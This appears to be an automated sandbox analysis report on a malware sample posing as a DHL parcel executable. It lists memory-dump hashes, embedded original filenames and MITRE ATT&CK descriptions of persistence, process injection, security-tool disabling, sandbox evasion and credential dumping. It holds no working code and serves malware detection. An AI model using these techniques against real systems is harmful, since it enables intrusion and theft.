Source File: 00000006.00000002.2314775222.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6ed0000_Size.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c10aa83ec16f09a8896331a2912a57d25a8ceb6cb799506397fd548a6e186b6a
Instruction ID: 44acf7cbea92b0ec576ec51ae874d03d78ef92ddcfee31bd5a4132eb786d2543
Opcode Fuzzy Hash: c10aa83ec16f09a8896331a2912a57d25a8ceb6cb799506397fd548a6e186b6a
Instruction Fuzzy Hash: 0BD0A730509208DFC784DB94D440EA8B7BCDB46754F3094AC980D67391CB329E02CBC4

Function 06EDB9D0 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2314775222.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6ed0000_Size.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c10aa83ec16f09a8896331a2912a57d25a8ceb6cb799506397fd548a6e186b6a
Instruction ID: 5a450824b87310dcca301a56b6704368e267b2bc1a1a4303039bab38660b666a
Opcode Fuzzy Hash: c10aa83ec16f09a8896331a2912a57d25a8ceb6cb799506397fd548a6e186b6a
Instruction Fuzzy Hash: D4D05E7050A208DBC784DA94D441AACB7ACDB56214F20909C980893351DA329E02CB84

Function 072F9F60 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2315640583.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_72f0000_Size.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1a1040d4d33de89876f18d76aa967767b93259da7d984b15eb23d127737b4b6
Instruction ID: af3836e97cc87f2c01eb32b1e241505f714f224889e6a9c923b1fce9b504dfbe
Opcode Fuzzy Hash: b1a1040d4d33de89876f18d76aa967767b93259da7d984b15eb23d127737b4b6
Instruction Fuzzy Hash: 91D05EB0529108EBC744DA94D440AA8F7BCDB46214F2081AC990D93391CA73AE42CB85

Function 03070B00 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2292730880.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3070000_Size.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfe3491a2f8386b3f52c7410be70c5d77dba94cd39e2cdaf7b3bd621abbea082
Instruction ID: c950eae9b562dfb7e19057d13e338952fa9df6115e895cc46aea025c1f386902
Opcode Fuzzy Hash: dfe3491a2f8386b3f52c7410be70c5d77dba94cd39e2cdaf7b3bd621abbea082
Instruction Fuzzy Hash: 6BD05B70A0230CEFCB00EFB8ED1455DBBF9EB45220B5045D9D408D7200DA315F009B44

Function 0307049F Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2292730880.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3070000_Size.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b545e8e313f3e45cb4fd9d1a7ae8b98303367bf346e74f3244923d73cbd290c6
Instruction ID: 194e328323623e7644f8252b5edc65484819dc244b6d7109fb0c168e32fedeb5
Opcode Fuzzy Hash: b545e8e313f3e45cb4fd9d1a7ae8b98303367bf346e74f3244923d73cbd290c6
Instruction Fuzzy Hash: 8ED0C93010E6C04FCB06A724AAB54947F74AE5724431A85C3C0858F5A7C5185E46C7A2

Function 072F61A0 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2315640583.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_72f0000_Size.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62023336b0b8f1feacb270ccc9b13b4d3a0b936aac08d741fdea0154e3da65f0
Instruction ID: efab8c351d279fe351fccd099f86ba4759dcea30d4b8a0ec931a40969b660c0f
Opcode Fuzzy Hash: 62023336b0b8f1feacb270ccc9b13b4d3a0b936aac08d741fdea0154e3da65f0
Instruction Fuzzy Hash: FCE0463461A128CBDB11CB45CC98F9AB7B2EB89300F0082C4D5085B390CA369D909F00

Function 03070D80 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2292730880.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3070000_Size.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf1f55adc8a57e0fa59e57c08a9b7a47b74b3fc443a171543c2cb4abb7bc05f4
Instruction ID: b6b12d4644aa9f55f2093ffd1b49e920aaa8176d9d035afd4af707d0ba84cceb
Opcode Fuzzy Hash: cf1f55adc8a57e0fa59e57c08a9b7a47b74b3fc443a171543c2cb4abb7bc05f4
Instruction Fuzzy Hash: CEC012357001148FC600A779E44884D77ED9F4A56531000A2F509C7334EA759C0187D4

Function 06ED33C1 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2314775222.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6ed0000_Size.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e42a48d837e895968cf4828cf8843e56a883775b918e79919968113b395abbfa
Instruction ID: 3f04ed4deb88ffdb4208182b15fc7946bcacf23728cd5e27c8a35d58f7ab3b71
Opcode Fuzzy Hash: e42a48d837e895968cf4828cf8843e56a883775b918e79919968113b395abbfa
Instruction Fuzzy Hash: 48D0C97510A385BFC3029B25E858C917FB8DF0B63470940DAF5848B233D6269A18C7A6

Function 06ED81CF Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2314775222.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6ed0000_Size.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab95d8e29850c598367d6d8326e150bf0f6aef6234de64a836a1ce0bfbe624b0
Instruction ID: a09a62ec4092d9498ad0f11c822450640bc74f38f679cf7714ef4157cc1af80b
Opcode Fuzzy Hash: ab95d8e29850c598367d6d8326e150bf0f6aef6234de64a836a1ce0bfbe624b0
Instruction Fuzzy Hash: 1FD0C7351052405FC6018F14C8A0C91BBA1AB56119718C4CBE4458B653C627DD17D711

Function 07364C39 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2315702132.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7360000_Size.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb41bf5972242bd10645bf5465be7f0fb14172441b9a9d1f9ea6074fe4f621d1
Instruction ID: 2e49e00006bf109de8def58fc765ee46108ee2596a30f5daff1cc5b4d0db7a65
Opcode Fuzzy Hash: cb41bf5972242bd10645bf5465be7f0fb14172441b9a9d1f9ea6074fe4f621d1
Instruction Fuzzy Hash: 43D02EB8706208CFCB048BA4C04CBC67AA1EB0A300F1080E5940D8B642CF344885CF22

Function 03070840 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2292730880.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3070000_Size.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e28cca41946a1c6d6ac6d4e18f47ffabe385545a637b76fb4e1caff1a774ef1
Instruction ID: 4487573464ca0d5954aa9fea8b48d003b09fcc2601c4eb905058448846c3178a
Opcode Fuzzy Hash: 1e28cca41946a1c6d6ac6d4e18f47ffabe385545a637b76fb4e1caff1a774ef1
Instruction Fuzzy Hash: DCD012B24093DAAFCB5317B0A4502D43FF4AE2312230610D2D084CD006D65845178723

Function 072F6944 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2315640583.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_72f0000_Size.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76c3877301371614966bd42246de2f900b37a575ca894be37d12689d6ff98d75
Instruction ID: 0784cd1654dae06861bc07771c0f9dbe823097927ab75216eba99e8b4b63f6fc
Opcode Fuzzy Hash: 76c3877301371614966bd42246de2f900b37a575ca894be37d12689d6ff98d75
Instruction Fuzzy Hash: 8CE0E27895922ACFCB20CF21DA48BEABBF1FB14300F1480E5D40963250E3784B9ACF00

Function 0737EAE0 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2315702132.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7360000_Size.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af7fdc3464aca29b3cbc5ca71522a8caf0d428dbb904b7b9994953e90931bd9b
Instruction ID: f8c70fec220ec8ea4f1527e71318984b8e703e6e637759d1051b55f14d953f9b
Opcode Fuzzy Hash: af7fdc3464aca29b3cbc5ca71522a8caf0d428dbb904b7b9994953e90931bd9b
Instruction Fuzzy Hash: 41C08CB00CA208C3D2A02348A048BB033DCAB06222F801450620D004E247AC80D0C689

Function 0307B118 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2292730880.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3070000_Size.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28f601446fd1f517cf6a34c437144dba9d7bcd93efc076aea385cdcd345b8bc4
Instruction ID: 6b759f301c53f29f63cd55481f61d621e852501fd58ba8f5f02f767c01bd3b6e
Opcode Fuzzy Hash: 28f601446fd1f517cf6a34c437144dba9d7bcd93efc076aea385cdcd345b8bc4
Instruction Fuzzy Hash: 61C08C300032048BD274B7ECA44CBED7AB86B10206F640020E30D52064CB7C4450CBAE

Function 030714C1 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2292730880.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3070000_Size.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57757d57e6360da5a9d7ac926a821be3e75a3ab1a7174b6310b61a15db4fa9c4
Instruction ID: e95bd17528156d38d7c1da2da5f927d6c759a0d29d37fce8c6e942fb3e75d4c0
Opcode Fuzzy Hash: 57757d57e6360da5a9d7ac926a821be3e75a3ab1a7174b6310b61a15db4fa9c4
Instruction Fuzzy Hash: 12D002351491C08FCB12DB78D9F5A907FB0AE8B20932E45D5C1818F677C626A427EB15

Function 06ED33D0 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2314775222.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6ed0000_Size.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94

Function 06ED74C0 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2314775222.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6ed0000_Size.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b2cfb01a21b29f55eddc762d3212f5ea8a29ed0267f97a2ae5523e90db53fe9
Instruction ID: 97a63d46c11b8e4b18f95a339b4dad011a2f7f419cdc5c3c87a219cdd08442b5
Opcode Fuzzy Hash: 4b2cfb01a21b29f55eddc762d3212f5ea8a29ed0267f97a2ae5523e90db53fe9
Instruction Fuzzy Hash: B6B0123200120CEBC700AF88E914C55BF6DEB58700700C025F70E06511CB33F822EBD4

Function 06ED52E9 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2314775222.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6ed0000_Size.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c4ad429d0f4b2f14d94d7e0afab8b75ac27d9dac7fae83f0fffe40287339a35
Instruction ID: cff4b933c9865858161a471f48f03edc64ad7dc519a590dc69850b7cce164f43
Opcode Fuzzy Hash: 9c4ad429d0f4b2f14d94d7e0afab8b75ac27d9dac7fae83f0fffe40287339a35
Instruction Fuzzy Hash: 21B09276140208EFC700DF64E444C447B74FF1936071180A1FA088B232C332D820DA80

Function 0307829A Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2292730880.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3070000_Size.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ed1401e530a7dd08eaaf35b6541de5ec9f32794de3c59ba35465fcdf97f9208
Instruction ID: 5cd183155cdaac057c0efbf856eb3a33d71a4401c75e6024be1f358eb728fca3
Opcode Fuzzy Hash: 9ed1401e530a7dd08eaaf35b6541de5ec9f32794de3c59ba35465fcdf97f9208
Instruction Fuzzy Hash: C5B012304071018BE3245B10C51CF783630B702341F0010D8810A121C1CBF808808B19

Function 03070850 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2292730880.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3070000_Size.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce826d1d56564d2a23e7eef453034335f7436c2d2123e290f22750485df70334
Instruction ID: 07a7cb430371628395f9677b5ae34b14cf6f2e8c085573f52e5480bf03fb4aac
Opcode Fuzzy Hash: ce826d1d56564d2a23e7eef453034335f7436c2d2123e290f22750485df70334
Instruction Fuzzy Hash: 9690023504564C8B45503796740A59D775C95545267920055A50D429055AA964504799

Function 03070CDB Relevance: .0, Instructions: 3COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2292730880.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3070000_Size.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: badc18b8933218582770cdbddf87e10c1bbf6a5a064dfcb967adc91458424cf2
Instruction ID: b35d925fd2069a7ef959563f7cf6182764a57b31bc528ac0007e996041724fdb
Opcode Fuzzy Hash: badc18b8933218582770cdbddf87e10c1bbf6a5a064dfcb967adc91458424cf2
Instruction Fuzzy Hash: A2A0222220B08A0ACBA0CB288B00088BF22AA803CC32C80C080033B223C22030C883C0

Source: DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2097900919.0000000002837000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe
Source: DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2096165607.0000000000ACE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe
Source: DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2110603697.00000000038C7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamehep.exe vs DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe
Source: DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2110603697.0000000003F68000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe
Source: DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2110603697.0000000003F68000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe
Source: DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2097900919.0000000002BB2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe
Source: DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2116558407.00000000066F0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe
Source: DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2110603697.00000000037E8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe
Source: DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2110603697.00000000037E8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBcmeiry.exe0 vs DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe
Source: DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2115169313.00000000063E0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMuzfeq.dll" vs DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe
Source: DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2117069451.0000000006940000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe
Source: DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000000.2027249803.0000000000512000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameBcmeiry.exe0 vs DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe
Source: DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2114393234.0000000005B99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBcmeiry.exe0 vs DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe
Source: DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2110603697.00000000039C4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamehep.exe vs DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe
Source: DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2110603697.00000000039C4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMuzfeq.dll" vs DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe
Source: DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2110603697.00000000039C4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe
Source: DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Binary or memory string: OriginalFilenameBcmeiry.exe0 vs DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

